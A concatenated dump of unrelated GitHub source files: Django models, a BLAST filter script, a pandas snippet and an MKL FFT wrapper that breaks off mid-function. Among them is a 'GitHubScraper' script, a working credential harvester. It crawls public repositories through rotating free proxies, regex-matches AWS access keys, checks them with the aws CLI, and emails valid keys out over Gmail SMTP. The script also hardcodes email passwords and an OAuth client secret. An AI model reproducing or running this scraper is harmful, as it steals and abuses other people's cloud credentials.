| no_license | https://github.com/AmolPachpute/RightArm | 9b5f94802f669c6cc3051d8b698b0e1f400694ba | 6d8cabdd9d6c2d46987935d770367a722a3274ed | refs/heads/master | 2021-01-23T03:33:33.179099 | 2014-08-26T09:52:08 | 2014-08-26T09:52:08 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.db import models
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from thumbs import ImageWithThumbsField
from ckeditor.fields import RichTextField
from Member.models import Member, Skills
from django.contrib.auth.models import User
from basemodule.models import *
import datetime
# Create your models here.
STATUS_CHOICES = ((0, u'Inception/New'), (1, u'In Progress'), (2, u'Completed'
))
POST_TYPE_CHOICES = (
(0, u'Text'),
(1, u'Image'),
(2, u'Video'),
(3, u'Link'),
(4, u'Audio'),
(5, u'Doc/Pdf'),
)
PROJECT_RELATION_TYPE_CHOICES = ((0, u'Owner'), (1, u'Moderator'), (2,
u'Giver'), (3, u'Member'))
TASK_PRIORITY_CHOICES = ((0, u'High'), (1, u'Medium'), (2, u'Low'))
TASK_STATUS_CHOICES = (
(0, u'Complete'),
(1, u'Incomplete'),
(2, u'Inprogress'),
(3, u'Not Yet Started'),
(4, u'Onhold'),
(5, u'Pending'),
)
OFFERED_TYPES = ((0, u'Physical'), (1, u'Virtual'))
class Beneficiary(Base):
""" Class describes beneficiaries for particular project """
name = models.CharField(max_length=100, blank=True, null=True)
description = RichTextField(blank=True, null = True)
def __unicode__(self):
return '%s' % self.name
class Goals(Base):
""" Class describes goals of the project """
name = models.CharField(max_length=100)
description = RichTextField(blank=True, null = True)
def __unicode__(self):
return '%s' % self.name
class Transact(Base):
""" Class describes project requirement types """
name = models.CharField(max_length=100)
description = RichTextField(blank=True, null = True)
def __unicode__(self):
return '%s' % self.name
class Project(Base):
""" This class Stores information about Project """
project_category = models.ForeignKey(Project_Category)
name = models.CharField(max_length=100)
image = ImageWithThumbsField(upload_to='static/%Y/%m/%d', sizes=((90,
120), (120, 120), (180, 240), (360, 480)),
blank=True, null=True)
summary = models.CharField('Project Objective', blank=True, null=True,
max_length=150)
description = RichTextField(blank=True, null = True)
requirement = RichTextField(blank=True, null = True)
target_amount = models.PositiveIntegerField('Target Amt', blank=True,
null=True)
status = models.IntegerField(choices=STATUS_CHOICES, default=0)
created_by = models.ForeignKey(Member, related_name='Project_CreatedBy')
beneficiaries = models.ManyToManyField(Beneficiary, blank=True, null=True)
transactions = models.ManyToManyField(Transact, blank=True, null=True)
goals = models.ManyToManyField(Goals, blank=True, null=True)
start_date = models.DateField(max_length=20, blank=True, null=True)
end_date = models.DateField(max_length=20, blank=True, null=True)
peoples = models.ManyToManyField(Member, through = 'Project_Member_Relationship', blank = True, null = True)
def __unicode__(self):
return '%s' % self.name
class Project_Member_Relationship(models.Model):
""" Class describes project member relationship """
relation_type = \
models.IntegerField(choices=PROJECT_RELATION_TYPE_CHOICES, default=0)
project = models.ForeignKey(Project)
member = models.ForeignKey(Member)
def __unicode__(self):
return '%s' % self.project.name
class Offer_Time(Base):
""" Class describes members who offered time for the projects """
offered_by = models.ForeignKey(Member)
project = models.ForeignKey(Project)
offered_type = models.IntegerField(choices=OFFERED_TYPES, default=0)
start_date = models.DateField(max_length=20, blank=True, null=True)
end_date = models.DateField(max_length=20, blank=True, null=True)
description = RichTextField(blank=True, null = True)
def __unicode__(self):
return self.offered_by
class Goods_Required_For_Project(Base):
""" Class describes goods required for the projects """
name = models.CharField(max_length=100)
description = RichTextField(blank=True, null = True)
url = models.URLField(blank=True)
qty = models.CharField(max_length=100, blank=True, null=True)
created_by = models.ForeignKey(Member, related_name='GoodsCreatedBy')
project = models.ForeignKey(Project)
def __unicode__(self):
return self.name
class Goods_Given_From_Member_To_Project(Base):
""" Class describes goods given from members to givers in the projects """
goods = models.ForeignKey(Goods_Required_For_Project)
given_by = models.ForeignKey(Member)
description = RichTextField(blank=True, null = True)
url = models.URLField(blank=True)
qty = models.CharField(max_length=100, blank=True, null=True)
def __unicode__(self):
return self.given_by
class Member_Skills(Base):
""" Class describes member skills to be used in the projects """
created_by = models.ForeignKey(Member, related_name='SkillsCreatedBy')
project = models.ForeignKey(Project)
skills = models.ManyToManyField(Skills, blank = True, null = True)
def __unicode__(self):
return self.project.name
class Influence(Base):
""" Class describes members who influence who for what purpose for \
the project """
influenced_by = models.ForeignKey(Member, related_name='InfluencedBy')
project = models.ForeignKey(Project)
description = RichTextField(blank=True, null = True)
def __unicode__(self):
return self.volunteer
class Post(Base):
""" Class describes posts of the projects """
post_type = models.IntegerField(choices=POST_TYPE_CHOICES, default=0)
project = models.ForeignKey(Project)
image = ImageWithThumbsField(upload_to='static/%Y/%m/%d', sizes=((90,
120), (180, 240), (360, 480)), blank=True,
null=True)
URL = models.CharField('Link url', max_length=200, blank=True)
description = RichTextField(blank=True, null = True)
video_file = models.FileField(upload_to='static/%Y/%m/%d', blank=True,
null=True)
audio_file = models.FileField(upload_to='static/%Y/%m/%d', blank=True,
null=True)
doc = models.FileField(upload_to='static/%Y/%m/%d', blank=True, null=True)
tags = models.ManyToManyField(Member, blank=True, null=True)
featured = models.BooleanField(default=False)
def __unicode__(self):
return self.post_type
class Task(Base):
""" Class describes project tasks """
name = models.CharField(max_length=100)
description = RichTextField(blank=True, null = True)
associated_goal = models.ForeignKey(Goals, blank=True, null=True)
assign_to = models.ManyToManyField(Member, blank=True, null=True)
priority = models.IntegerField(choices=TASK_PRIORITY_CHOICES, default=1)
status = models.IntegerField(choices=TASK_STATUS_CHOICES, default=3)
content_type = models.ForeignKey(ContentType,
verbose_name=_('content type'),
related_name='TaskCPTM')
object_id = models.TextField(_('object ID'))
from_date = models.DateField(max_length=20, blank=True, null=True)
to_date = models.DateField(max_length=20)
parent = models.ForeignKey('self', blank=True, null=True)
def __unicode__(self):
return self.name
| UTF-8 | Python | false | false | 7,712 | py | 37 | models.py | 35 | 0.653786 | 0.639263 | 0 | 224 | 33.428571 | 112 |
staccDOTsol/GitHubScraper | 1,932,735,295,260 | 2850f500c5ad2ee9dfefa0eb2eff7493b7ea02ea | 63910ef32836751a8cf24d8b8e9ec17b2fd2757c | /python.py | 5cb5782ff8569cd4bd9a360f2d405bc30b9a4efe | []
| no_license | https://github.com/staccDOTsol/GitHubScraper | 8222810cfc2f099df90095bfec9d45e776081d00 | 5fb145ca2f5a0102a8e6c36a6a5d4d8f75be6b32 | refs/heads/master | 2023-01-22T06:45:42.058551 | 2020-12-04T07:52:05 | 2020-12-04T07:52:05 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import requests
from urllib3.contrib import pyopenssl
import json
import re
import smtplib
import lxml.html as html
import numpy
import time
import os
from subprocess import *
import subprocess
from compiler.pycodegen import EXCEPT
from multiprocessing.dummy import Pool as ThreadPool
bannedIps = []
xyz = 221875000
requests.adapters.DEFAULT_RETRIES = 1
def newpool(num):
try:
global xyz
repos = []
x = xyz - (num * 5000)
pool = ThreadPool(num)
xyzs = []
i = 0
y = num
while i <= num:
xyzs.append(xyz / y * i)
i = i + 1
i = 0
while i <= y:
repos.append('https://api.github.com/repositories?since=' + str(int(xyzs[i]) + 1))
print str(int(xyzs[i]) + 1)
i = i + 1
#print i
#print repos
results = pool.map(getContrib, repos)
#close the pool and wait for the work to finish
print 'waiting... xyz=' + str(xyz)
pool.close()
pool.join()
except Exception as e:
newpool(1)
#getContrib(repos, shake)
def getCommits(url, shake):
import urllib2
global bannedIps
import json
#print url
page = requests.get('https://free-proxy-list.net/')
webpage = html.fromstring(page.content)
proxy = []
i = 0
proxies = webpage.xpath("//tbody/tr/td[1]/text()")
ports = webpage.xpath("//tbody/tr/td[2]/text()")
secure = webpage.xpath("//td[7]/text()")
for proxyy in proxies:
if secure[i] == 'yes':
proxy.append((proxyy) + ":" + (ports[i]))
#print proxy[i]
i = i + 1
#proxy.append('198.100.158.142:3128')
#proxy.append('192.95.4.14:8080')
#proxy.append('167.114.23.80:8080')
#proxy.append('167.114.47.242:8080')
#proxy.append('158.69.31.45:3128')
#proxy.append('198.50.212.32:8799')
#proxy.append('149.56.147.46:80')
#proxy.append('144.217.31.225:3128')
page = requests.get('https://hidemy.name/en/proxy-list/?type=s')
webpage = html.fromstring(page.content)
i = 0
proxies = webpage.xpath("//tbody/tr/td[1]/text()")
ports = webpage.xpath("//tbody/tr/td[2]/text()")
for proxyy in proxies:
proxy.append((proxyy) + ":" + (ports[i]))
#print proxy[i]
i = i + 1
page = requests.get('https://www.socks-proxy.net/')
webpage = html.fromstring(page.content)
i = 0
proxies = webpage.xpath("//tbody/tr/td[1]/text()")
ports = webpage.xpath("//tbody/tr/td[2]/text()")
secure = webpage.xpath("//td[7]/text()")
for proxyy in proxies:
if secure[i] == 'yes':
proxy.append((proxyy) + ":" + (ports[i]))
#print proxy[i]
i = i + 1
from random import randint
from random import seed
import random
import uuid
rand = numpy.random.randint(0, len(proxy))
#print rand
#print proxy[rand]
done = False
while done == False:
if 'https://' + proxy[rand] not in bannedIps:
proxyDict = {
'https':'https://' + proxy[rand]
#'https':'https://168.235.64.108:8081'
}
done = True
print proxyDict
try:
time.sleep(0.5)
#req = requests.get(url, proxies=proxyDict)
req = requests.get(url + "?" + shake, proxies=proxyDict, timeout = 40)
print url
json = json.loads(req.content)
for item in json:
print item['sha']
try:
f = open("logs.txt", "a+b")
f.write(item['sha'] + "\n")
f.close()
print item['sha']
getUrl(url[:-8] + '/contents/?ref=' + item['sha'], shake)
except Exception as e:
f = open("logs.txt", "a+b")
f.write('getBranch: ' + str(e) + ': ' + req.content +'\n')
f.close()
print 'getBranch: ' + str(e) + ': ' + req.content
getCommits(url, shake)
except Exception as e:
print e
getCommits(url, shake)
#print req.content
def getUrl(url, shake):
import urllib2
global bannedIps
import json
#print url
page = requests.get('https://free-proxy-list.net/')
webpage = html.fromstring(page.content)
proxy = []
i = 0
proxies = webpage.xpath("//tbody/tr/td[1]/text()")
ports = webpage.xpath("//tbody/tr/td[2]/text()")
secure = webpage.xpath("//td[7]/text()")
for proxyy in proxies:
if secure[i] == 'yes':
proxy.append((proxyy) + ":" + (ports[i]))
#print proxy[i]
i = i + 1
#proxy.append('198.100.158.142:3128')
#proxy.append('192.95.4.14:8080')
#proxy.append('167.114.23.80:8080')
#proxy.append('167.114.47.242:8080')
#proxy.append('158.69.31.45:3128')
#proxy.append('198.50.212.32:8799')
#proxy.append('149.56.147.46:80')
#proxy.append('144.217.31.225:3128')
page = requests.get('https://hidemy.name/en/proxy-list/?type=s')
webpage = html.fromstring(page.content)
i = 0
proxies = webpage.xpath("//tbody/tr/td[1]/text()")
ports = webpage.xpath("//tbody/tr/td[2]/text()")
for proxyy in proxies:
proxy.append((proxyy) + ":" + (ports[i]))
#print proxy[i]
i = i + 1
page = requests.get('https://www.socks-proxy.net/')
webpage = html.fromstring(page.content)
i = 0
proxies = webpage.xpath("//tbody/tr/td[1]/text()")
ports = webpage.xpath("//tbody/tr/td[2]/text()")
secure = webpage.xpath("//td[7]/text()")
for proxyy in proxies:
if secure[i] == 'yes':
proxy.append((proxyy) + ":" + (ports[i]))
#print proxy[i]
i = i + 1
from random import randint
from random import seed
import random
import uuid
rand = numpy.random.randint(0, len(proxy))
#print rand
#print proxy[rand]
done = False
while done == False:
if 'https://' + proxy[rand] not in bannedIps:
proxyDict = {
'https':'https://' + proxy[rand]
#'https':'https://168.235.64.108:8081'
}
done = True
print proxyDict
try:
print url
#req = requests.get(url, proxies=proxyDict)
time.sleep(0.5)
req = requests.get(url + "&" + shake, proxies=proxyDict, timeout = 40)
f = open("logs.txt", "a+b")
f.write(url + "&" + shake + '\n')
f.close()
print url + "&" + shake
json = json.loads(req.content)
print json
for item in json:
#time.sleep(.8)
try:
for attribute, value in item.iteritems():
if attribute == 'type':
if value == 'dir':
f = open("logs.txt", "a+b")
f.write('dir: ' + item['name'] + '\n')
f.close()
print 'dir: ' + item['name']
#print attribute, value # example usage
if url.split("?ref=",1)[1]:
contentsDir = url.split("/?ref=",1)[0] + '/' + item['name'] + '/?ref=' + url.split("?ref=",1)[1]
else:
contentsDir = url + '/' + item['name']
getUrl(contentsDir, shake)
elif value == 'file':
f = open("logs.txt", "a+b")
f.write(item['download_url'] + '\n')
f.close()
print item['download_url']
#content2 = requests.get(item['download_url'], proxies=proxyDict).content
content2 = requests.get(item['download_url']).content
id = re.search(r'(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])', content2)
#if (id):
# print "id: " + id.group()
#print 'searching...'
key = re.search(r'(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])', content2)
if (key):
if (id):
p = Popen( ["sh"], stdin=PIPE, stdout=PIPE )
time.sleep(1)
p.stdin.write("aws configure\n")
time.sleep(4)
p.stdin.write(id.group() + "\n")
time.sleep(1)
p.stdin.write(key.group() + "\n")
time.sleep(1)
p.stdin.write("\n")
time.sleep(1)
p.stdin.write("\n")
time.sleep(1)
def awsdescribe():
p = subprocess.Popen(["aws", "ec2", "describe-instances"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = p.stderr.read()
return output
out = awsdescribe()
print out
if 'AuthFailure' in out:
print 'authfailure!'
else:
msg = "\r\n".join([
"From: jarettrsdunn@gmail.com",
"To: jarettrsdunn@gmail.com",
"Subject: new match",
"",
"id: " + id.group() + "\nkey: " + key.group() + '\n\n'
])
username = 'jarettrsdunn@gmail.com'
password = 'yarite'
server = smtplib.SMTP('smtp.gmail.com:587')
server.ehlo()
server.starttls()
fromaddr = "jarettrsdunn@gmail.com"
toaddrs = ["jarettrsdunn@gmail.com"]
server.login(username,password)
server.sendmail(fromaddr, toaddrs, msg)
server.quit()
f = open("output.txt", "a+b")
f.write("id: " + id.group() + "\nkey: " + key.group() + '\n\n')
f.close()
print "id: " + id.group() + "key: " + key.group()
except Exception as e:
f = open("logs.txt", "a+b")
f.write('geturl: url=' + url + ' : ' + str(e) + ': ' + req.content + '\n')
f.close()
if 'good news' in req.content:
print 'goodnews, geturl: url=' + url + ' : ' + str(e) + ': ' + req.content
getUrl(url, shake)
else:
print 'geturl: url=' + url + ' : ' + str(e) + ': ' + req.content
except Exception as e:
#bannedIps.append(proxyDict['https'])
#print bannedIps
f = open("logs.txt", "a+b")
f.write('exception ip: ' + str(proxyDict) + ' & geturl: ' + str(e) + '\n')
f.close()
print 'exception ip: ' + str(proxyDict) + ' & geturl: ' + str(e)
getUrl(url, shake)
#print req.content
def getContrib(url):
global bannedIps
print 'start...'
shake = 'client_id=e3e911583253bb372cf1&client_secret=ee07a00c62b08be09ce29db876865af37ec5c1d1'
import urllib2
import json
#print url
page = requests.get('https://free-proxy-list.net/')
webpage = html.fromstring(page.content)
proxy = []
i = 0
proxies = webpage.xpath("//tbody/tr/td[1]/text()")
ports = webpage.xpath("//tbody/tr/td[2]/text()")
secure = webpage.xpath("//td[7]/text()")
for proxyy in proxies:
if secure[i] == 'yes':
proxy.append((proxyy) + ":" + (ports[i]))
#print proxy[i]
i = i + 1
page = requests.get('https://hidemy.name/en/proxy-list/?type=s')
webpage = html.fromstring(page.content)
i = 0
proxies = webpage.xpath("//tbody/tr/td[1]/text()")
ports = webpage.xpath("//tbody/tr/td[2]/text()")
for proxyy in proxies:
proxy.append((proxyy) + ":" + (ports[i]))
#print proxy[i]
i = i + 1
page = requests.get('https://www.socks-proxy.net/')
webpage = html.fromstring(page.content)
i = 0
proxies = webpage.xpath("//tbody/tr/td[1]/text()")
ports = webpage.xpath("//tbody/tr/td[2]/text()")
secure = webpage.xpath("//td[7]/text()")
for proxyy in proxies:
if secure[i] == 'yes':
proxy.append((proxyy) + ":" + (ports[i]))
#print proxy[i]
i = i + 1
#proxy.append('198.100.158.142:3128')
#proxy.append('192.95.4.14:8080')
#proxy.append('167.114.23.80:8080')
#proxy.append('167.114.47.242:8080')
#roxy.append('158.69.31.45:3128')
#proxy.append('198.50.212.32:8799')
#proxy.append('149.56.147.46:80')
#proxy.append('144.217.31.225:3128')
from random import randint
from random import seed
import random
import uuid
rand = numpy.random.randint(0, len(proxy))
#print rand
#print proxy[rand]
done = False
while done == False:
if 'https://' + proxy[rand] not in bannedIps:
proxyDict = {
'https':'https://' + proxy[rand]
#'https':'https://168.235.64.108:8081'
}
done = True
print proxyDict
try:
print url
#req = requests.get(url, proxies=proxyDict)
#rand = numpy.random.randint(1, 11)
from random import randint
time.sleep(randint(1, 16))
req = requests.get(url + "&" + shake, proxies=proxyDict, timeout = 40)
json = json.loads(req.content)
#print req.content
first = True
#for item in json:
print str(json[0]['id']) + ": " + str(json[0]['full_name'])
#print item['id']
if first == True:
#print item['id']
first = False
commits = 'https://api.github.com/repos/' + json[0]['full_name'] + '/commits'
branches = 'https://api.github.com/repos/' + json[0]['full_name'] + '/branches'
#print contents
id = json[0]['id']
found = False
for line in open('ids.txt').readlines():
found = False
#print line
if line.startswith(str(id)):
found = True
print 'found id already friend'
break
if not found:
getCommits(commits, shake)
f = open("ids.txt", "a+b")
f.write(str(id) + "\n")
f.close()
#print id
repos = 'https://api.github.com/repositories?since=' + str(id)
print str(id)
getContrib(repos)
except Exception as e:
print e
getContrib(url)
print 'DONE!'
repos = []
newpool(1)
#print req.content
import time
print 'lala'
if 1:
msg = "\r\n".join([
"From: jarettrsdunn@gmail.com",
"To: jarettrsdunn@gmail.com",
"Subject: new match",
"",
"id: wooo\n\n"
])
username = 'jarettrsdunn@gmail.com'
password = 'w0rdp4ss1'
server = smtplib.SMTP('smtp.gmail.com:587')
server.ehlo()
server.starttls()
fromaddr = "jarettrsdunn@gmail.com"
toaddrs = ["jarettrsdunn@gmail.com"]
server.login(username,password)
server.sendmail(fromaddr, toaddrs, msg)
server.quit()
newpool(10)
| UTF-8 | Python | false | false | 15,731 | py | 2 | python.py | 1 | 0.481724 | 0.446507 | 0 | 455 | 33.540659 | 129 |
wegnerce/python_scripting | 10,909,216,957,227 | b5c001ccdc0616b195ad670b297cb018b5906171 | b4b900170acb702b12aa77c2708f59ec2107fa49 | /metagenomics/filter_blast.py | 39da08b29dfad936d74df09eef601d0177df0075 | []
| no_license | https://github.com/wegnerce/python_scripting | cf6435d0fa2ad41615c6ff06d44f28449904272c | 6230d3f0489c67af18db5b13e48e888018b2cceb | refs/heads/main | 2023-04-11T23:28:39.990998 | 2021-04-28T06:43:17 | 2021-04-28T06:43:17 | 362,132,027 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue Jan 19 10:50:17 2016
@author: calle
"""
# needed modules
import csv
import taxman as tx
# required paths
blast_out = "/media/STORAGE1/Stasja_pro/to_filter/mRNA_assemblies/total/total_mRNA_contigs_trans.faa.out"
blast_out_filtered = "/media/STORAGE1/Stasja_pro/to_filter/mRNA_assemblies/total/total_mRNA_contigs_trans_out_filtered.out"
# process blast output, filter hits originating from plants
with open(blast_out, "rb") as infile, open(blast_out_filtered, "wb") as outfile:
blast_reader = csv.reader(infile, delimiter = "\t")
for line in blast_reader:
gi_hit = line[1].split("|")[1]
if not 33090 in tx.getPathByTaxid(tx.getTaxidByGi(gi_hit)):
print tx.getPathByTaxid(tx.getTaxidByGi(gi_hit))
outfile.write("\t".join(line)+"\n")
| UTF-8 | Python | false | false | 826 | py | 156 | filter_blast.py | 155 | 0.690073 | 0.663438 | 0 | 24 | 33.416667 | 123 |
lovro-sinda/dretveno_programiranje | 6,451,040,888,938 | f858c1a43d44bc603f16436ce7386ff0cfb805a1 | 6862d9d91b40de9e15c932131d8b9cb2641c1ee2 | /Moneyball/web_scraping/test.py | c6dca9bd5314587e2612c8243fd7e17eb28f6eef | []
| no_license | https://github.com/lovro-sinda/dretveno_programiranje | fdfbb0e7b00cb95b463fc75726dfb02c5a41df4a | 4d972e1f50e89f5d760ae834f7075a009f2888f9 | refs/heads/master | 2020-05-02T04:06:29.744638 | 2019-09-14T09:34:31 | 2019-09-14T09:34:31 | 177,742,455 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pandas as pd
df = pd.read_csv("dr1.csv")
df['new_column'] = 'some_value'
df.to_csv('dr1.csv')
| UTF-8 | Python | false | false | 101 | py | 32 | test.py | 6 | 0.653465 | 0.633663 | 0 | 4 | 24.25 | 31 |
ajeldorado/falco-python | 17,274,358,496,634 | 87d49f54cba853fa5b4ae5b1dfda2630acea5e3b | 7650c4b0404ff25c26ed5c29e544ed00e259ca50 | /falco/mkl_fft.py | 3a3b144cffc57e2157e2196d261aa5c0284de8a9 | [
"Apache-2.0"
]
| permissive | https://github.com/ajeldorado/falco-python | b32e1ab24d521a6790b4c18a96a4fa9d239c7882 | 406ccf60392542630a7f1f629fc020b8c8e613d2 | refs/heads/master | 2022-11-06T03:27:12.604912 | 2022-10-07T15:22:19 | 2022-10-07T15:22:19 | 137,521,218 | 5 | 2 | Apache-2.0 | false | 2022-10-07T15:22:58 | 2018-06-15T18:43:56 | 2022-06-13T03:06:15 | 2022-10-07T15:22:19 | 7,116 | 5 | 4 | 0 | Python | false | false | """
Wrapper for the MKL FFT routines. This implements very fast FFT on Intel
processors, much faster than the stock fftpack routines in numpy/scipy.
"""
from __future__ import division, print_function
import numpy as np
import ctypes as _ctypes
import os
from dftidefs import *
def load_libmkl():
r"""Loads the MKL library if it can be found in the library load path.
Raises
------
ValueError
If the MKL library cannot be found.
"""
if os.name == 'posix':
try:
lib_mkl = os.getenv('LIBMKL')
if lib_mkl is None:
raise ValueError('LIBMKL environment variable not found')
return _ctypes.cdll.LoadLibrary(lib_mkl)
except:
pass
        try:
            return _ctypes.cdll.LoadLibrary("libmkl_rt.so")
        except:
            pass
        try:
            return _ctypes.cdll.LoadLibrary("libmkl_rt.dylib")
        except:
            raise ValueError('MKL Library not found')
else:
try:
return _ctypes.cdll.LoadLibrary("mkl_rt.dll")
except:
raise ValueError('MKL Library not found')
mkl = load_libmkl()
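# Note (editor's addition): if libmkl_rt is not on the default loader path, the
# LIBMKL environment variable checked above can point at it explicitly before this
# module is imported. The path below is only an example and depends on the MKL install:
#   export LIBMKL=/opt/intel/mkl/lib/intel64/libmkl_rt.so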
def mkl_rfft(a, n=None, axis=-1, norm=None, direction='forward', out=None, scrambled=False):
r"""Forward/backward 1D double-precision real-complex FFT.
Uses the Intel MKL libraries distributed with Anaconda Python.
Normalisation is different from Numpy!
By default, allocates new memory like 'a' for output data.
Returns the array containing output data.
See Also
--------
rfft, irfft
"""
if axis == -1:
axis = a.ndim-1
# This code only works for 1D and 2D arrays
assert a.ndim < 3
assert (axis < a.ndim and axis >= -1)
assert (direction == 'forward' or direction == 'backward')
# Convert input to complex data type if real (also memory copy)
if direction == 'forward' and a.dtype != np.float32 and a.dtype != np.float64:
if a.dtype == np.int64 or a.dtype == np.uint64:
a = np.array(a, dtype=np.float64)
else:
a = np.array(a, dtype=np.float32)
elif direction == 'backward' and a.dtype != np.complex128 and a.dtype != np.complex64:
if a.dtype == np.int64 or a.dtype == np.uint64 or a.dtype == np.float64:
a = np.array(a, dtype=np.complex128)
else:
a = np.array(a, dtype=np.complex64)
order = 'C'
if a.flags['F_CONTIGUOUS'] and not a.flags['C_CONTIGUOUS']:
order = 'F'
# Add zero padding or truncate if needed (incurs memory copy)
if n is not None:
m = n if direction == 'forward' else (n // 2 + 1)
if a.shape[axis] < m:
# pad axis with zeros
            pad_width = np.zeros((a.ndim, 2), dtype=int)
pad_width[axis,1] = m - a.shape[axis]
a = np.pad(a, pad_width, mode='constant')
elif a.shape[axis] > m:
# truncate along axis
b = np.swapaxes(a, axis, 0)[:m,]
a = np.swapaxes(b, 0, axis).copy()
elif direction == 'forward':
n = a.shape[axis]
elif direction == 'backward':
n = 2*(a.shape[axis]-1)
# determine output type
if direction == 'backward':
out_type = np.float64
if a.dtype == np.complex64:
out_type = np.float32
elif direction == 'forward':
out_type = np.complex128
if a.dtype == np.float32:
out_type = np.complex64
# Configure output array
assert a is not out
if out is not None:
assert out.dtype == out_type
for i in range(a.ndim):
if i != axis:
assert a.shape[i] == out.shape[i]
if direction == 'forward':
assert (n // 2 + 1) == out.shape[axis]
else:
assert out.shape[axis] == n
assert not np.may_share_memory(a, out)
else:
size = list(a.shape)
size[axis] = n // 2 + 1 if direction == 'forward' else n
out = np.empty(size, dtype=out_type, order=order)
# Define length, number of transforms strides
length = _ctypes.c_int(n)
n_transforms = _ctypes.c_int(np.prod(a.shape) // a.shape[axis])
# For strides, the C type used *must* be long
strides = (_ctypes.c_long*2)(0, a.strides[axis] // a.itemsize)
if a.ndim == 2:
if axis == 0:
distance = _ctypes.c_int(a.strides[1] // a.itemsize)
out_distance = _ctypes.c_int(out.strides[1] // out.itemsize)
else:
distance = _ctypes.c_int(a.strides[0] // a.itemsize)
out_distance = _ctypes.c_int(out.strides[0] // out.itemsize)
double_precision = True
if (direction == 'forward' and a.dtype == np.float32) or (direction == 'backward' and a.dtype == np.complex64):
double_precision = False
# Create the description handle
Desc_Handle = _ctypes.c_void_p(0)
if not double_precision:
mkl.DftiCreateDescriptor(_ctypes.byref(Desc_Handle), DFTI_SINGLE, DFTI_REAL, _ctypes.c_int(1), length)
else:
mkl.DftiCreateDescriptor(_ctypes.byref(Desc_Handle), DFTI_DOUBLE, DFTI_REAL, _ctypes.c_int(1), length)
# set the storage type
mkl.DftiSetValue(Desc_Handle, DFTI_CONJUGATE_EVEN_STORAGE, DFTI_COMPLEX_COMPLEX)
# set normalization factor
if norm == 'ortho':
scale = _ctypes.c_double(1 / np.sqrt(n))
mkl.DftiSetValue(Desc_Handle, DFTI_FORWARD_SCALE, scale)
mkl.DftiSetValue(Desc_Handle, DFTI_BACKWARD_SCALE, scale)
elif norm is None:
scale = _ctypes.c_double(1. / n)
s = mkl.DftiSetValue(Desc_Handle, DFTI_BACKWARD_SCALE, scale)
# set all values if necessary
if a.ndim != 1:
mkl.DftiSetValue(Desc_Handle, DFTI_NUMBER_OF_TRANSFORMS, n_transforms)
mkl.DftiSetValue(Desc_Handle, DFTI_INPUT_DISTANCE, distance)
mkl.DftiSetValue(Desc_Handle, DFTI_OUTPUT_DISTANCE, out_distance)
mkl.DftiSetValue(Desc_Handle, DFTI_INPUT_STRIDES, _ctypes.byref(strides))
mkl.DftiSetValue(Desc_Handle, DFTI_OUTPUT_STRIDES, _ctypes.byref(strides))
if scrambled:
s = mkl.DftiSetValue(Desc_Handle, DFTI_ORDERING, DFTI_BACKWARD_SCRAMBLED)
if direction == 'forward':
fft_func = mkl.DftiComputeForward
elif direction == 'backward':
fft_func = mkl.DftiComputeBackward
else:
assert False
# Not-in-place FFT
mkl.DftiSetValue(Desc_Handle, DFTI_PLACEMENT, DFTI_NOT_INPLACE)
mkl.DftiCommitDescriptor(Desc_Handle)
fft_func(Desc_Handle, a.ctypes.data_as(_ctypes.c_void_p), out.ctypes.data_as(_ctypes.c_void_p) )
mkl.DftiFreeDescriptor(_ctypes.byref(Desc_Handle))
return out
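# Illustrative usage sketch (editor's addition, not part of the original module):
# a minimal forward/backward round trip through mkl_rfft. With the default
# norm=None the forward pass is unscaled and the backward pass applies 1/n,
# so the input should be recovered to numerical precision. The _example_* name
# is purely illustrative.
def _example_mkl_rfft_roundtrip():
    x = np.random.rand(64)                        # real input, n = 64
    X = mkl_rfft(x, direction='forward')          # complex half-spectrum, length n // 2 + 1
    y = mkl_rfft(X, n=64, direction='backward')   # back to a real array of length 64
    assert np.allclose(x, y)
    return X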
def mkl_fft(a, n=None, axis=-1, norm=None, direction='forward', out=None, scrambled=False):
r"""Forward/backward 1D single- or double-precision FFT.
Uses the Intel MKL libraries distributed with Anaconda Python.
Normalisation is different from Numpy!
By default, allocates new memory like 'a' for output data.
Returns the array containing output data.
See Also
--------
fft, ifft
"""
# This code only works for 1D and 2D arrays
assert a.ndim < 3
assert axis < a.ndim and axis >= -1
    # Add zero padding or truncate along the axis if needed (incurs memory copy)
if n is not None:
if a.shape[axis] < n:
# pad axis with zeros
            pad_width = np.zeros((a.ndim, 2), dtype=int)
pad_width[axis,1] = n - a.shape[axis]
a = np.pad(a, pad_width, mode='constant')
elif a.shape[axis] > n:
# truncate along axis
b = np.swapaxes(a, axis, -1)[...,:n]
a = np.swapaxes(b, -1, axis).copy()
# Convert input to complex data type if real (also memory copy)
if a.dtype != np.complex128 and a.dtype != np.complex64:
if a.dtype == np.int64 or a.dtype == np.uint64 or a.dtype == np.float64:
a = np.array(a, dtype=np.complex128)
else:
a = np.array(a, dtype=np.complex64)
# Configure in-place vs out-of-place
inplace = False
if out is a:
inplace = True
elif out is not None:
assert out.dtype == a.dtype
assert a.shape == out.shape
assert not np.may_share_memory(a, out)
else:
out = np.empty_like(a)
# Define length, number of transforms strides
length = _ctypes.c_int(a.shape[axis])
n_transforms = _ctypes.c_int(np.prod(a.shape) // a.shape[axis])
# For strides, the C type used *must* be long
strides = (_ctypes.c_long*2)(0, a.strides[axis] // a.itemsize)
if a.ndim == 2:
if axis == 0:
distance = _ctypes.c_int(a.strides[1] // a.itemsize)
else:
distance = _ctypes.c_int(a.strides[0] // a.itemsize)
# Create the description handle
Desc_Handle = _ctypes.c_void_p(0)
if a.dtype == np.complex64:
mkl.DftiCreateDescriptor(_ctypes.byref(Desc_Handle), DFTI_SINGLE, DFTI_COMPLEX, _ctypes.c_int(1), length)
elif a.dtype == np.complex128:
mkl.DftiCreateDescriptor(_ctypes.byref(Desc_Handle), DFTI_DOUBLE, DFTI_COMPLEX, _ctypes.c_int(1), length)
# Set normalization factor
if norm == 'ortho':
if a.dtype == np.complex64:
scale = _ctypes.c_float(1 / np.sqrt(a.shape[axis]))
else:
scale = _ctypes.c_double(1 / np.sqrt(a.shape[axis]))
